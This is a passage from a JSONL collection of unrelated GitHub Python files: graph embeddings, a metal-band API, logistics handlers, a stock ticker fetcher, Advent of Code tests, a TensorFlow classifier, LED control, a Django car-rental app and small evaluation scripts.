order\r\n reindexed_graph = nx.convert_node_labels_to_integers(graph, ordering='sorted', label_attribute='old_label')\r\n\r\n return reindexed_graph\r\n\r\ndef showGraph(graph):\r\n pos = nx.kamada_kawai_layout(graph)\r\n fig, ax = plt.subplots(figsize=(10, 10))\r\n nx.draw_networkx_nodes(graph, pos, ax=ax, node_size=100, node_color='blue')\r\n nx.draw_networkx_edges(graph, pos, ax=ax, edge_color='gray', alpha=0.5)\r\n ax.axis('off')\r\n\r\n return fig\r\n\r\ndef create_embeddings(url):\r\n\r\n graph=create_graph_from_post(url)\r\n model=Node2Vec(dimensions=128)\r\n model.fit(graph)\r\n node_embeddings=model.get_embedding()\r\n\r\n return node_embeddings \r\n\r\ndef interactions(url, logreg_node):\r\n # Gather Input Data\r\n #submission = reddit.submission(url)\r\n #text = submission.title + ' ' + submission.selftext\r\n\r\n label_encoder = LabelEncoder()\r\n label_encoder.fit(['non_interaction', 'interaction'])\r\n node_embeddings = create_embeddings(url)\r\n\r\n prediction_node = logreg_node.predict(node_embeddings)\r\n num_interactions_node = len(prediction_node[prediction_node == label_encoder.transform(['interaction'])])\r\n\r\n print(\"Number of interactions: \", num_interactions_node )\r\n\r\n return num_interactions_node","repo_name":"Robert-Dobrei/ML-on-graphs","sub_path":"Backend.py","file_name":"Backend.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27103411113","text":"def convert_band_to_dict(band):\n band_data = {}\n band_data['name'] = band.name\n band_data['id'] = band.ma_id\n band_data['url'] = band.url\n band_data['country'] = band.country\n band_data['genre'] = band.genre\n band_data['status'] = band.status\n band_data['lyrical_themes'] = band.lyrical_themes\n band_data['formation_year'] = band.formation_year\n band_data['years_active'] = band.years_active\n band_data['location'] = band.location\n band_data['description'] = band.description\n band_data['similar_artists'] = []\n for similar_artist in band.similarartist_set.all():\n band_data['similar_artists'].append({\n 'id': similar_artist.ma_id,\n 'name': similar_artist.name,\n 'country': similar_artist.country,\n 'genre': similar_artist.genre,\n 'url': similar_artist.url\n })\n band_data['related_links'] = []\n for related_link in band.relatedlinks_set.all():\n band_data['related_links'].append({\n 'category': related_link.category,\n 'type': related_link.link_type,\n 'url': related_link.url\n })\n return band_data\n\ndef convert_release_to_dict(release):\n release_data = {}\n release_data['band'] = release.band.name\n release_data['band_id'] = release.band.ma_id\n release_data['band_url'] = release.band.url\n release_data['name'] = release.name\n release_data['notes'] = release.notes\n release_data['length'] = release.length\n release_data['release_id'] = release.release_id\n release_data['release_type'] = release.release_type\n release_data['release_year'] = release.release_year\n release_data['songs'] = []\n for song in release.song_set.all():\n release_data['songs'].append({\n 'name': song.name,\n 'track_number': song.track_number,\n 'length': song.length,\n 'lyrics': song.lyrics,\n })\n\n release_data['lineup'] = []\n # Releases only have one lineup? We should change our models.\n for lineup in release.releaselineup_set.all():\n for musician in lineup.releasemusician_set.all():\n release_data['lineup'].append({\n 'name': musician.name,\n 'role': musician.role\n })\n return release_data\n\ndef convert_musician_set_to_dict(lineup):\n lineup_data = {}\n lineup_data['musicians'] = []\n for musician in lineup.bandmusician_set.all():\n lineup_data['musicians'].append({\n 'name': musician.name,\n 'role': musician.role\n })\n return lineup_data\n","repo_name":"tobocop2/MetalAPI","sub_path":"MetalAPI/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"19003562875","text":"from django.db import transaction\nfrom logistics.util import config\nfrom logistics_project.apps.malawi.handlers.abstract.base import RecordResponseHandler\nfrom logistics.models import StockRequest\nfrom logistics.decorators import logistics_contact_and_permission_required, managed_products_required\nfrom logistics.shortcuts import create_stock_report\n\n\nclass StockReportBaseHandler(RecordResponseHandler):\n hsa = None\n requests = []\n \n \n def get_report_type(self):\n raise NotImplemented(\"This method must be overridden\")\n \n def send_responses(self):\n raise NotImplemented(\"This method must be overridden\")\n\n @transaction.commit_on_success\n @logistics_contact_and_permission_required(config.Operations.REPORT_STOCK)\n @managed_products_required()\n def handle(self, text):\n \"\"\"\n Check some preconditions, based on shared assumptions of these handlers.\n Return true if there is a precondition that wasn't met. If all preconditions\n are met, the variables for facility and name will be set.\n \n This method will manage some replies as well.\n \"\"\"\n # at some point we may want more granular permissions for these\n # operations, but for now we just share the one\n self.hsa = self.msg.logistics_contact\n \n stock_report = create_stock_report(self.get_report_type(), \n self.hsa.supply_point,\n text, \n self.msg.logger_msg)\n self.requests = StockRequest.create_from_report(stock_report, self.hsa)\n self.send_responses(stock_report)","repo_name":"viyouen/logistics","sub_path":"logistics_project/apps/malawi/handlers/abstract/stockreport.py","file_name":"stockreport.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"42501035675","text":"import requests\nimport pandas as pd\nimport io\nimport yfinance as yf\nfrom dictmanip import loader, saver\nimport os\n\ndef main(symboldata, symbol):\n # read the Symbols in\n\n try:\n # download the stock price\n TICK = yf.Ticker(symbol).info\n sharesOutstanding = TICK['sharesOutstanding']\n df = pd.DataFrame.from_dict(TICK, orient='index').T\n print(df.head())\n derp = os.path.join(path,symbol+'.csv')\n df.to_csv(derp, mode='a', header = True )\n except Exception:\n print('Error {}'.format(symbol))\n\n print('success')\n return\n\n\n\n\n\nif __name__ == '__main__':\n\n symbol = 'GME'\n symboldir = symbol+'_data'\n output_dir = 'symboldata' # this can be changed, but this is what I use.\n path = os.path.join(output_dir, symboldir)\n main(path, symbol)\n\n ''' try:\n # download the stock price\n stock = []\n stock = yf.download(i,start=start, end=end, progress=False)\n\n # append the individual stock prices\n if len(stock) == 0:\n None\n else:\n stock['Name']=i\n stock_final = stock_final.append(stock,sort=False)\n except Exception:\n None\n '''\n","repo_name":"pookiemaker/shorts","sub_path":"python/getTickerInfo.py","file_name":"getTickerInfo.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40785224445","text":"from day10.run_day_10 import (\n count_joltage_diffs,\n count_joltage_paths,\n make_joltage_chain,\n)\nimport pytest\n\n\n@pytest.fixture\ndef example_input():\n return [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]\n\n\n@pytest.fixture\ndef large_input():\n return [\n 28,\n 33,\n 18,\n 42,\n 31,\n 14,\n 46,\n 20,\n 48,\n 47,\n 24,\n 23,\n 49,\n 45,\n 19,\n 38,\n 39,\n 11,\n 1,\n 32,\n 25,\n 35,\n 8,\n 17,\n 7,\n 9,\n 4,\n 2,\n 34,\n 10,\n 3,\n ]\n\n\ndef test_make_joltage_chain(example_input):\n joltages = make_joltage_chain(example_input)\n\n expected = [0, 1, 4, 5, 6, 7, 10, 11, 12, 15, 16, 19, 22]\n\n assert expected == joltages\n\n\ndef test_count_diffs(example_input):\n joltages = make_joltage_chain(example_input)\n\n diff_counter = count_joltage_diffs(joltages)\n\n assert 7 == diff_counter[1]\n assert 5 == diff_counter[3]\n\n\ndef test_large_example(large_input):\n joltages = make_joltage_chain(large_input)\n diff_counter = count_joltage_diffs(joltages)\n\n assert 22 == diff_counter[1]\n assert 10 == diff_counter[3]\n\n\ndef test_small_path_counter(example_input):\n joltages = make_joltage_chain(example_input)\n\n assert 8 == count_joltage_paths(joltages)\n\n\ndef test_large_path_counter(large_input):\n joltages = make_joltage_chain(large_input)\n\n assert 19208 == count_joltage_paths(joltages)","repo_name":"cadolphs/advent_of_code_2020","sub_path":"day10/test_day_10.py","file_name":"test_day_10.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14607675164","text":"# -*- coding: utf-8 -*-\n\nimport csv\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import pickle\n\n\nclass event(object):\n id = \"\"\n name = \"\"\n precision = 0.0\n recall = 0.0\n f1Score = 0.0\n predictedPositives = 0\n realPositives = 0\n matched = 0\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n\nclass image(object):\n document_id = \"\"\n event_type = \"\"\n\n def __init__(self, document_id, event_type):\n self.document_id = document_id\n self.event_type = event_type\n\n\ndef initEvents(_events):\n eventsList = []\n i = 0\n for e in _events:\n eventsList.append(event(i, e))\n i += 1\n return eventsList\n\n\ndef getData(_fileName):\n with open(_fileName, 'rb') as f:\n itemList = []\n reader = csv.reader(f)\n for row in reader:\n splitted = str(row).strip('[ \\' ]').split(r' ') # \\t for tabs\n itemList.append(image(splitted[0], splitted[1]))\n return itemList\n\n\ndef countTrueImagesByEvent(_imgList, _event):\n cont = 0\n for image in _imgList:\n if image.event_type == _event:\n cont += 1\n return cont\n\n\ndef evaluate(_rList, _vList, _k):\n vListLength = len(_vList)\n if (_k == \"all\" or _k > vListLength):\n _k = vListLength\n\n averagePrecision = 0.0\n averageRecall = 0.0\n averageF1Score = 0.0\n eventsCount = len(eventsList)\n\n for event in eventsList:\n print(\"Calculating for event '\" + event.name + \"'\")\n predictedPositives = countTrueImagesByEvent(_vList, event.name)\n realPositives = countTrueImagesByEvent(_rList, event.name)\n cont = 0\n matched = 0\n\n for vImage in _vList:\n if cont >= _k:\n break\n cont += 1\n if vImage.event_type == event.name:\n for rImage in _rList:\n if rImage.document_id == vImage.document_id:\n if rImage.event_type == vImage.event_type:\n matched += 1\n break\n\n event.predictedPositives = predictedPositives\n event.realPositives = realPositives\n event.matched = matched\n\n #Precision\n if predictedPositives == 0:\n event.precission = 0\n else:\n event.precision = ((float(matched) / float(predictedPositives)))\n averagePrecision += event.precision\n\n #Recall\n if realPositives == 0:\n event.recall = 0\n else:\n event.recall = ((float(matched) / float(realPositives)))\n averageRecall += event.recall\n\n #F1 Score\n if (event.precision + event.recall) == 0:\n event.f1Score = 0\n else:\n event.f1Score = ((2.0 * ((event.precision * event.recall) / (event.precision + event.recall))))\n averageF1Score += event.f1Score\n\n # print(\"Predicted Positives: \" + str(predictedPositives))\n # print(\"Real Positives: \" + str(realPositives))\n # print(\"Matched: \" + str(matched))\n\n averagePrecision /= eventsCount\n averageRecall /= eventsCount\n averageF1Score /= eventsCount\n\n return [averagePrecision, averageRecall, averageF1Score]\n\n\ndef calcAccuracy(_rList, _vList, _k):\n hits = 0\n cont = 0\n\n if _k == \"all\":\n _k = len(_vList)\n\n for vImage in _vList:\n if cont >= _k:\n break\n cont += 1\n for rImage in _rList:\n if rImage.document_id == vImage.document_id:\n if rImage.event_type == vImage.event_type:\n hits += 1\n break\n\n return float(hits) / float(len(_vList))\n\n\ndef calcMistakesAndMatches(_rList, _vList, _k):\n mistakes = 0\n matches = 0\n cont = 0\n\n if _k == \"all\":\n _k = len(_vList)\n\n for vImage in _vList:\n if cont >= _k:\n break\n cont += 1\n for rImage in _rList:\n if rImage.document_id == vImage.document_id:\n if rImage.event_type != vImage.event_type:\n mistakes += 1\n else:\n matches += 1\n break\n return [mistakes, matches]\n\n\ndef writeResults(_fileName):\n oFile = open(_fileName, 'wb')\n wr = csv.writer(oFile)\n\n wr.writerow([\"Precission: \" + (\"%.4f\" % results[0])])\n wr.writerow([\"Recall: \" + (\"%.4f\" % results[1])])\n wr.writerow([\"F1 Score: \" + (\"%.4f\" % results[2])])\n wr.writerow([\"Accuracy: \" + (\"%.4f\" % results[3])])\n wr.writerow([\"Mistakes: \" + (str(results[4]))])\n wr.writerow([\"Matches: \" + (str(results[5]))])\n\n for event in eventsList:\n wr.writerow([\n str(event.id)\n + \" \" + event.name\n + \" \" + (\"%.4f\" % event.precision)\n + \" \" + (\"%.4f\" % event.recall)\n + \" \" + (\"%.4f\" % event.f1Score)\n ])\n\n\ndef printResults():\n print(\"GLOBAL RESULTS\")\n print(\"Precission: \" + (\"%.4f\" % results[0]))\n print(\"Recall: \" + (\"%.4f\" % results[1]))\n print(\"F1 Score: \" + (\"%.4f\" % results[2]))\n print(\"Accuracy: \" + (\"%.4f\" % results[3]))\n print(\"Mistakes: \" + (str(results[4])))\n print(\"Matches: \" + (str(results[5])))\n\n print(\"\\n\")\n print(\"RESULTS FOR EACH EVENT\")\n print(\"EVENT ID \" \n + \"EVENT NAME \"\n + \"PRECISION \"\n + \"RECALL \"\n + \"F1 SCORE \"\n + \"PRED. POS. \"\n + \"REAL POS. \"\n + \"MATCHED \"\n + \"MISTAKES\")\n\n for event in eventsList:\n nameRestChars = 18 - len(event.name)\n realPosRestChars = 18 - len(str(event.predictedPositives))\n matchedRestChars = 18 - len(str(event.realPositives))\n mistakesRestChars = 18 - len(str(event.matched))\n nameSpace = \"\"\n realPosSpace = \"\"\n matchedSpace = \"\"\n mistakesSpace = \"\"\n for i in range(0, nameRestChars):\n nameSpace += \" \"\n for i in range(0, realPosRestChars):\n realPosSpace += \" \"\n for i in range(0, matchedRestChars):\n matchedSpace += \" \"\n for i in range(0, mistakesRestChars):\n mistakesSpace += \" \"\n print(str(event.id)\n + \" \" + event.name\n + nameSpace + (\"%.4f\" % event.precision)\n + \" \" + (\"%.4f\" % event.recall)\n + \" \" + (\"%.4f\" % event.f1Score)\n + \" \" + (str(event.predictedPositives))\n + realPosSpace + (str(event.realPositives))\n + matchedSpace + (str(event.matched))\n + mistakesSpace + (str(event.predictedPositives - event.matched))\n )\n\n\ndef printGraphs():\n y_pos = np.arange(len(eventsNames))\n precision = []\n recall = []\n mistakes = []\n for event in eventsList:\n precision.append(event.precision)\n recall.append(event.recall)\n mistakes.append(event.predictedPositives - event.matched)\n \n #Precision\n plt.barh(y_pos, precision, align='center', color=\"#1abc9c\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Precision')\n plt.title('Precision for each class')\n plt.show()\n\n #Recall\n plt.barh(y_pos, recall, align='center', color=\"#9b59b6\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Recall')\n plt.title('Recall for each class')\n plt.show()\n\n #Mistakes\n plt.barh(y_pos, mistakes, align='center', color=\"#e74c3c\")\n plt.yticks(y_pos, eventsNames)\n plt.xlabel('Mistakes')\n plt.title('Mistakes for each class')\n plt.show()\n\n\n\n\n\n######################\n#### MAIN PROGRAM ####\n######################\n\n# FILES VARS\nreferenceFileName = \"groundtruth/groundtruth_1.csv\" # \"groundtruth/evaluable_groundtruth.csv\" # Arxiu de la solució per comparar els resultats.\nevaluableFileName = \"classified.txt\" # Arxiu a evaluar.\nresultsFileName = \"results.txt\" # Arxiu on escriurem els resultats.\n\n# Setting the K value\nk = \"all\" # Set k to \"all\" if we want to analyse all the values\n\neventsNames = [\n \"concert\",\n \"conference\",\n \"exhibition\",\n \"fashion\",\n \"other\",\n \"protest\",\n \"sports\",\n \"theater_dance\",\n \"non_event\"\n]\n\n#Init events\nprint(\"Initializing the events\")\neventsList = initEvents(eventsNames)\n\n#Load the reference and evaluable list\nprint(\"Reading the reference 'image - event' table from the file '\" + referenceFileName + \"'\")\nreferenceList = getData(referenceFileName)\n\nprint(\"Reading the evaluable 'image - event' table from the file '\" + evaluableFileName + \"'\")\nevaluableList = getData(evaluableFileName)\n\nprint(\"\\n\")\nprint(\"Starting to calculate...\")\nresults = evaluate(referenceList, evaluableList, k)\nresults.append(calcAccuracy(referenceList, evaluableList, k))\nmistakes_matches = calcMistakesAndMatches(referenceList, evaluableList, k)\nmistakes = mistakes_matches[0]\nmatches = mistakes_matches[1]\nresults.append(mistakes)\nresults.append(matches)\n\nprint(\"\\n\")\nprint(\"Writing the obtained results in the file '\" + resultsFileName + \"'\")\nwriteResults(resultsFileName)\n\nprint(\"\\n\")\nprintResults()\nprint(\"\\n\")\n\nprint(\"Printing graphs...\")\nprint(\"\\n\")\nprintGraphs()\nprint(\"\\n\")\n","repo_name":"jesusmariocalleja/projecte-gdsa-2014","sub_path":"avaluador.py","file_name":"avaluador.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20185285144","text":"#coding=utf-8\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint('tf version:', tf.__version__)\n\n# Load data\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\nprint('train shape:', type(train_images), train_images.shape, train_labels.shape)\nprint('train shape:', type(test_images), test_images.shape, test_labels.shape)\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# Data normalization, 归一化\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n# conv2D\ntrain_images = train_images[..., tf.newaxis]\ntest_images = test_images[..., tf.newaxis]\n\n# Build network\nmodel = keras.Sequential([\n #keras.layers.Flatten(input_shape=(28, 28)), #28*28=784,没有参数需要学习\n keras.layers.Conv2D(32, 2, activation='relu'),\n keras.layers.Flatten(),\n keras.layers.Dense(128, activation='relu'), #input=784, output=128\n keras.layers.Dense(10, activation='softmax') #input=128, output=10\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n# Train\nmodel.fit(train_images, train_labels, batch_size=64, epochs=10)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\nprint('\\nTest accuracy:', test_acc)\n\n# predict\npredictions = model.predict(test_images)\nprint(np.argmax(predictions[0]), test_labels[0], predictions[0])\n\n","repo_name":"yehongyu/ml_models","sub_path":"tf/cloth_image_classifier.py","file_name":"cloth_image_classifier.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27055644784","text":"import os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nimport time\n\nrgb = None\ninput_pin = None\nstate = 'red'\n\ndef setup():\n global rgb, input_pin\n\n M5.begin()\n rgb = RGB(io=5, n=30, type = \"WS2812\")\n input_pin = Pin(41, mode=Pin.IN, pull=Pin.PULL_UP)\n \n\n\ndef loop():\n global rgb,state\n M5.update()\n x = input()\n x = str(x)\n time.sleep_ms(10)\n \n if x == \"Open\":\n rgb.set_brightness(100)\n state = 'red'\n elif x == \"Close\":\n rgb.set_brightness(0)\n elif x == \"OK\":\n rgb.set_brightness(100)\n state = 'green'\n \n if (state == 'green'):\n for i in range(100):\n rgb.fill_color(get_color(0,i,0))\n time.sleep_ms(10)\n \n elif(state == 'red'):\n #chase RGB blue:\n for i in range(30):\n rgb.set_color(i, get_color(0,255,230))\n time.sleep_ms(20)\n for i in range(30):\n rgb.set_color(i, get_color(255,158,179))\n time.sleep_ms(20)\n #rgb.fill_color(0xff0000)\n #time.sleep_ms(250)\n \n \ndef get_color(r, g, b):\n rgb_color = (r << 16) | (g << 8) | b\n return rgb_color\n\nprint('color =', hex(get_color(255, 0, 0)))\nprint('color =', hex(get_color(0, 255, 0)))\n\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n loop()\n except (Exception, KeyboardInterrupt) as e:\n try:\n from utility import print_error_msg\n print_error_msg(e)\n except ImportError:\n print(\"please update to latest firmware\")\n \n\n\n\n\n","repo_name":"resistantJs/Yida_Adv_Interactive_Prototype","sub_path":"Assignment4/Final_Final.py","file_name":"Final_Final.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70561892969","text":"# Made by Grufoony\n\nimport random as rnd\nimport time \nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport boltzmann as b\n \nclass board:\n\tdef __init__(self,nrows=5,ncols=5,pocket=5):\n\t\tself.nrows = nrows\n\t\tself.ncols = ncols\n\t\tself.nodes = [pocket for i in range(nrows*ncols)]\n\tdef print(self):\n\t\ti = 0\n\t\tfor element in self.nodes:\n\t\t\tprint(element, end=' ')\n\t\t\ti += 1\n\t\t\tif i == self.ncols:\n\t\t\t\tprint('\\n')\n\t\t\t\ti = 0\n\tdef neighbors(self,pos):\n\t\tneighbors = []\n\t\tif pos % self.ncols == 0: \n\t\t\tneighbors.append(pos + 1)\n\t\telif (pos+1) % self.ncols == 0:\n\t\t\tneighbors.append(pos - 1)\n\t\telse:\n\t\t\tneighbors.append(pos + 1)\n\t\t\tneighbors.append(pos - 1)\n\t\tif pos < self.ncols:\n\t\t\tneighbors.append(pos + self.ncols)\n\t\telif (pos >= self.ncols*(self.nrows - 1)) and (pos < self.ncols*self.nrows):\n\t\t\tneighbors.append(pos - self.ncols)\n\t\telse:\n\t\t\tneighbors.append(pos + self.ncols)\n\t\t\tneighbors.append(pos - self.ncols)\n\t\treturn neighbors\n\tdef evolve(self):\n\t\tfor pos in range(len(self.nodes)):\n\t\t\tneighbour = rnd.choice(self.neighbors(pos))\n\t\t\tif rnd.uniform(0,1) < 0.5:\n\t\t\t\tself.nodes[pos] += 1\n\t\t\t\tif self.nodes[neighbour] > 0:\n\t\t\t\t\tself.nodes[neighbour] -= 1\n\t\t\telse:\n\t\t\t\tif self.nodes[pos] > 0:\n\t\t\t\t\tself.nodes[pos] -= 1\n\t\t\t\tself.nodes[neighbour] += 1\n\tdef data(self):\n\t\tx = np.arange(0, max(self.nodes)+1)\n\t\ty = np.zeros(max(self.nodes)+1)\n\t\tfor element in self.nodes:\n\t\t\ty[element] += 1\n\t\treturn x,y\n\t\t\nmyboard = board(50, 50)\t\n\nfor i in range(99):\n\tstart = time.time_ns()\n\tmyboard.evolve()\t\n\tfinish = time.time_ns()\n\tprint(\"el\",(finish-start)/1000000000)\ndata = myboard.data()\nplt.plot(data[0],data[1])\nplt.show()\n\ncdata = b.simulate(100,100,5) \nplt.plot(cdata[0],cdata[1])\nplt.show()\n","repo_name":"Grufoony/Physics_Unibo","sub_path":"src/Complex_Systems/boltzmann.py","file_name":"boltzmann.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39727987240","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.models import Permission\nimport datetime\nfrom django.utils import timezone\nfrom PIL import Image\n\n\nclass AdditionalEquipment(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\n\nclass Engine(models.Model):\n name = models.CharField(max_length=200)\n power = models.FloatField(default=0)\n consummation = models.FloatField(default=0)\n\n def __str__(self):\n return self.name\n\nclass FuelType(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\nclass ModelOfCar(models.Model):\n name = models.CharField(max_length=200)\n modelImg=models.ImageField(upload_to='car_pictures/',default='/static/car/car-default.jpg')\n def __str__(self):\n return self.name\n\nclass Gallery(models.Model):\n userImg = models.ImageField(upload_to='car_pictures/', default='NULL')\n\nclass City(models.Model):\n name = models.CharField(max_length=200)\n map_link = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\nclass BankCard(models.Model):\n full_name = models.CharField(max_length=64)\n card_numbers = models.CharField(max_length=16)\n expiration_month = models.CharField(max_length=10, null=True)\n expiration_year = models.CharField(max_length=4, null=True)\n cvv_code = models.CharField(max_length=4)\n country = models.CharField(max_length=200)\n\n def __str__(self):\n return self.full_name\n\n\nclass DriverLicense(models.Model):\n license_picture = models.ImageField(upload_to='license_pictures/', default='NULL')\n\nclass Contact(models.Model):\n full_name = models.CharField(max_length=30)\n email_address = models.EmailField(max_length=30)\n website = models.CharField(max_length=200)\n subject = models.CharField(max_length=200)\n message = models.TextField(max_length=200)\n\n def __str__(self):\n return self.full_name\n\nclass Car(models.Model):\n name = models.CharField(max_length=200)\n model_id = models.ForeignKey(ModelOfCar, on_delete=models.CASCADE, default=1)\n model_year = models.IntegerField()\n price_hourly = models.FloatField()\n available = models.BooleanField()\n rate = models.IntegerField(default=0)\n desciption_text = models.TextField(max_length=1000,default='')\n engine_id = models.ForeignKey(Engine, on_delete=models.CASCADE,default=1)\n fuel_id = models.ForeignKey(FuelType, on_delete=models.CASCADE,default=1)\n picture_id = models.ForeignKey(Gallery, on_delete=models.CASCADE,default=1)\n add_equip_id = models.ForeignKey(AdditionalEquipment, on_delete=models.CASCADE,default=1)\n city_id = models.ForeignKey(City, on_delete=models.CASCADE, default=0)\n start_date = models.DateField('starting date',null=True, blank=True)\n end_date = models.DateField('ending date',null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering=['rate']\n\n\nclass SimpleUser(AbstractUser):\n birth_date = models.DateTimeField('date of birth', null=True, blank=True)\n address = models.CharField(default='NULL',max_length=200)\n userImg = models.ImageField(upload_to='user_avas/', default='user_avas/default.jpg')\n bank_card_id = models.ForeignKey(BankCard, on_delete=models.PROTECT, default=1)\n license_id = models.ForeignKey(DriverLicense, on_delete=models.PROTECT, default=1)\n\n def was_born_date(self):\n return self.birth_date >= timezone.now() - datetime.timedelta(days=1)\n\n def save(self, *args, **kwargs):\n super().save()\n\n img = Image.open(self.userImg.path)\n\n if img.height > 300 or img.width > 300:\n output_size = (300, 300)\n img.thumbnail(output_size)\n img.save(self.userImg.path)\n\n\nclass Order(models.Model):\n car_id = models.ForeignKey(Car, on_delete=models.PROTECT, null=True)\n user_id = models.ForeignKey(SimpleUser, on_delete=models.PROTECT, null=True)\n approves = models.BooleanField(null=True, blank=True, default=True)\n finished = models.BooleanField(null=True, blank=True, default=False)\n canceled = models.BooleanField(null=True, blank=True, default=False)\n total_price = models.IntegerField(default=0)\n rate = models.IntegerField(default=0)\n bank_card_id = models.ForeignKey(BankCard, on_delete=models.PROTECT, default=1)\n license_id = models.ForeignKey(DriverLicense, on_delete=models.PROTECT, default=1)\n email_address = models.EmailField(max_length=30, null=True)\n start_date = models.DateField('starting date',null=True, blank=True)\n end_date = models.DateField('ending date',null=True, blank=True)\n","repo_name":"XANALI/nomadRent","sub_path":"ourApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17441210874","text":"# 문서 검색\ndef search_index(doc, a, i):\n global num\n for j in range(len(a)):\n if a[j] != doc[i+j]:\n return i+1\n num += 1\n return i+len(a)\n\ndef search_a(doc, a):\n l = len(doc)\n l_a = len(a)\n i = 0\n while i < l:\n if a[0] == doc[i] and (l-i) >= l_a:\n i = search_index(doc, a, i)\n else:\n i += 1\n\ndoc = input()\na = input()\nnum = 0\nsearch_a(doc, a)\nprint(num)\n\n# 다른 solution\nprint(input().count(input()))","repo_name":"dodoyeon/SW_Academy","sub_path":"greedy/1543_search.py","file_name":"1543_search.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32772720510","text":"# Suppose you are given a data structure which is a list of dictionaries as follows:\n# cities = [\n# {'Name':'Vancouver','State':'WA','Population':161791},\n# {'Name':'Salem','State':'OR','Population':154637},\n# {'Name':'Seattle','State':'WA','Population':608660},\n# {'Name':'Spokane','State':'WA','Population':208916},\n# ...\n# ]\n\n\n# Complete the function max_in_state to return the city (as a dictionary) \n# with the highest population in a given state. \n# If the population is a tie then return the city that comes first alphabetically.\n\n# If cities contained only the dictionaries above, a call to max_in_state(cities, 'WA') would return:\n# {'Name':'Seattle','State':'WA','Population':608660}\n\n#PF-Prac-39\ndef max_populated_state(cities_dict, state):\n #start writing your code here\n max_populated_city = cities_dict[0]\n for i in cities_dict:\n if i['State'] == state:\n if max_populated_city['State']!=state:\n max_populated_city = i\n else:\n if max_populated_city['Population']<=i['Population']:\n if max_populated_city['Population'] == i['Population']:\n max_populated_city = i if i['Name']<max_populated_city['Name'] else max_populated_city\n else:\n max_populated_city = i\n \n return max_populated_city\n\n\ncities_dict = [\n {'Name': 'Vancouver', 'State': 'WA', 'Population': 161791},\n {'Name': 'Salem', 'State': 'OR', 'Population': 154637},\n {'Name': 'Seattle', 'State': 'WA', 'Population': 80885},\n {'Name': 'Bellingham', 'State': 'WA', 'Population': 608660},\n {'Name': 'Spokane', 'State': 'WA', 'Population': 208916},\n {'Name': 'Bellevue', 'State': 'WA', 'Population': 608660},\n {'Name': 'Portland', 'State': 'OR', 'Population': 583776}\n]\nstate = \"WA\"\nprint(\"The city details are:\", cities_dict)\nprint(\"State:\", state)\noutput = max_populated_state(cities_dict, state)\nprint(\"The highest populated city in the given state is:\", output)\n","repo_name":"Pawan459/infytq-pf-day9","sub_path":"medium/Problem_39.py","file_name":"Problem_39.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17385595022","text":"# GRAFICO PARA EL LOG DE SPLIKTV\n\n# importo pandas para leer el log, y bokeh para crear el grafico\nimport pandas\nfrom bokeh.plotting import figure, save\nfrom bokeh.io import output_file, show\nfrom bokeh.io import curdoc\nfrom bokeh.models import DatetimeTickFormatter\nfrom bokeh.models import WheelZoomTool\nfrom bokeh.models import Range1d\nfrom bokeh.models import HoverTool, ColumnDataSource\n\n# seteo el nombre de las columnas\nnombre_de_columnas = [\"Fecha\",\"Hora\",\"Estado\",\"Descripcion\"]\n\n# leo el log parseando fecha y hora\ndf = pandas.read_csv(\"log.txt\",\n names = nombre_de_columnas,\n parse_dates = [\"Fecha\",\"Hora\"]\n)\n\n# filtro solamente las activaciones exitosas, el resto lo descarto\ndf = df.query('Descripcion == \"activado\"')\n\n# seteo los ejes 